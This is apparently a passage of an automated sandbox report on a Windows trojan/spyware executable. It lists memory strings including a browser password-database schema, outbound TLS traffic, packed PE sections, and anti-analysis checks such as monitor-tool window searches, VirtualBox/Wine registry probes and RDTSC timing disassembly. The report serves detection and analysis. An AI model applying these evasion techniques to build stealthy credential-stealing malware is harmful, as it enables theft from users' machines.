Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49727 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: IERiUft8Wi.exe	Static PE information: section name:
Source: IERiUft8Wi.exe	Static PE information: section name: .idata
Source: IERiUft8Wi.exe	Static PE information: section name:

Source: IERiUft8Wi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: IERiUft8Wi.exe	Static PE information: Section: ZLIB complexity 0.9995851205065359
Source: IERiUft8Wi.exe	Static PE information: Section: jvzofgxg ZLIB complexity 0.9946556193946189

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IERiUft8Wi.exe, 00000000.00000003.1345212498.000000000568E000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344822762.00000000056AA000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1370392940.000000000569E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: IERiUft8Wi.exe	Virustotal: Detection: 54%
Source: IERiUft8Wi.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

File read: C:\Users\user\Desktop\IERiUft8Wi.exe

Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: IERiUft8Wi.exe

Static file information: File size 1884672 > 1048576

Source: IERiUft8Wi.exe

Static PE information: Raw size of jvzofgxg is bigger than: 0x100000 < 0x1a2200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Unpacked PE file: 0.2.IERiUft8Wi.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jvzofgxg:EW;jsezhyer:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jvzofgxg:EW;jsezhyer:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: IERiUft8Wi.exe

Static PE information: real checksum: 0x1d4f86 should be: 0x1db5e9

Source: IERiUft8Wi.exe	Static PE information: section name:
Source: IERiUft8Wi.exe	Static PE information: section name: .idata
Source: IERiUft8Wi.exe	Static PE information: section name:
Source: IERiUft8Wi.exe	Static PE information: section name: jvzofgxg
Source: IERiUft8Wi.exe	Static PE information: section name: jsezhyer
Source: IERiUft8Wi.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAF178 push eax; iretd	0_3_00DAF179
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAF178 push eax; iretd	0_3_00DAF179
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAF178 push eax; iretd	0_3_00DAF179
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAF178 push eax; iretd	0_3_00DAF179
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAF178 push eax; iretd	0_3_00DAF179
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DACF68 push eax; iretd	0_3_00DACF69
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DACF68 push eax; iretd	0_3_00DACF69
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DACF68 push eax; iretd	0_3_00DACF69
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DACF68 push eax; iretd	0_3_00DACF69
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DACF68 push eax; iretd	0_3_00DACF69
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAD1D8 push eax; iretd	0_3_00DAD1D9
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DADD7B push eax; ret	0_3_00DADD89
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Code function: 0_3_00DAF178 push eax; iretd	0_3_00DAF179

Source: IERiUft8Wi.exe	Static PE information: section name: entropy: 7.981882961435573
Source: IERiUft8Wi.exe	Static PE information: section name: jvzofgxg entropy: 7.955291479684767

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 888FD5 second address: 888FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 888FDB second address: 888854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1EE2h], edx 0x00000014 push dword ptr [ebp+122D0EB5h] 0x0000001a jg 00007F0E38E1CB1Ch 0x00000020 call dword ptr [ebp+122D3647h] 0x00000026 pushad 0x00000027 jmp 00007F0E38E1CB21h 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov edi, dword ptr [ebp+122D2A3Dh] 0x00000035 mov ebx, dword ptr [ebp+122D2B09h] 0x0000003b popad 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dl, bl 0x00000043 mov dx, 5E00h 0x00000047 popad 0x00000048 jns 00007F0E38E1CB1Ch 0x0000004e mov dword ptr [ebp+122D2BC5h], eax 0x00000054 jmp 00007F0E38E1CB1Dh 0x00000059 mov esi, 0000003Ch 0x0000005e jmp 00007F0E38E1CB29h 0x00000063 jmp 00007F0E38E1CB21h 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jnl 00007F0E38E1CB17h 0x00000072 lodsw 0x00000074 sub dword ptr [ebp+122D3657h], edx 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D3657h], edi 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 pushad 0x00000089 movsx edi, si 0x0000008c mov dword ptr [ebp+122D1D25h], esi 0x00000092 popad 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 jmp 00007F0E38E1CB23h 0x0000009b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A0D245 second address: A0D24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A0D67A second address: A0D687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F0E38E1CB16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A0D687 second address: A0D6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A359h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A0D946 second address: A0D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E38E1CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A1162C second address: A1164A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E3850A356h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A1164A second address: A1165C instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A1165C second address: A11666 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11719 second address: A1171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A1171F second address: A11740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D2AC5h] 0x0000000f push 00000000h 0x00000011 add si, A9AAh 0x00000016 push CF8AF700h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A1183E second address: A1184C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0E38E1CB1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A1184C second address: A118D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 08998B3Dh 0x0000000c push ecx 0x0000000d jmp 00007F0E3850A34Fh 0x00000012 pop edx 0x00000013 push 00000003h 0x00000015 mov dh, cl 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F0E3850A353h 0x00000020 jmp 00007F0E3850A354h 0x00000025 popad 0x00000026 mov dword ptr [ebp+122D35BAh], esi 0x0000002c popad 0x0000002d sub dword ptr [ebp+122D2C94h], esi 0x00000033 push 00000003h 0x00000035 jmp 00007F0E3850A354h 0x0000003a call 00007F0E3850A349h 0x0000003f jmp 00007F0E3850A34Ch 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A118D7 second address: A118DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A118DB second address: A11914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007F0E3850A351h 0x00000015 jmp 00007F0E3850A34Bh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007F0E3850A34Eh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11914 second address: A11918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11A4F second address: A11A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E3850A359h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11A6F second address: A11AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0E38E1CB21h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jns 00007F0E38E1CB37h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007F0E38E1CB25h 0x0000001f pushad 0x00000020 jmp 00007F0E38E1CB25h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11AE3 second address: A11AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11AF4 second address: A11AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A11AF9 second address: A11BC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E3850A35Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b cld 0x0000000c mov esi, dword ptr [ebp+122D1D0Ah] 0x00000012 push 00000003h 0x00000014 mov edx, dword ptr [ebp+122D2A39h] 0x0000001a push 00000000h 0x0000001c mov di, 2C55h 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F0E3850A348h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov esi, dword ptr [ebp+122D334Bh] 0x00000042 call 00007F0E3850A349h 0x00000047 jc 00007F0E3850A356h 0x0000004d jmp 00007F0E3850A350h 0x00000052 push eax 0x00000053 jmp 00007F0E3850A350h 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c jno 00007F0E3850A35Bh 0x00000062 mov eax, dword ptr [eax] 0x00000064 jmp 00007F0E3850A353h 0x00000069 mov dword ptr [esp+04h], eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jnp 00007F0E3850A348h 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A33324 second address: A33337 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F0E38E1CB16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A31141 second address: A31147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A31147 second address: A3114B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A312C2 second address: A312DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F0E3850A352h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A312DF second address: A312E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
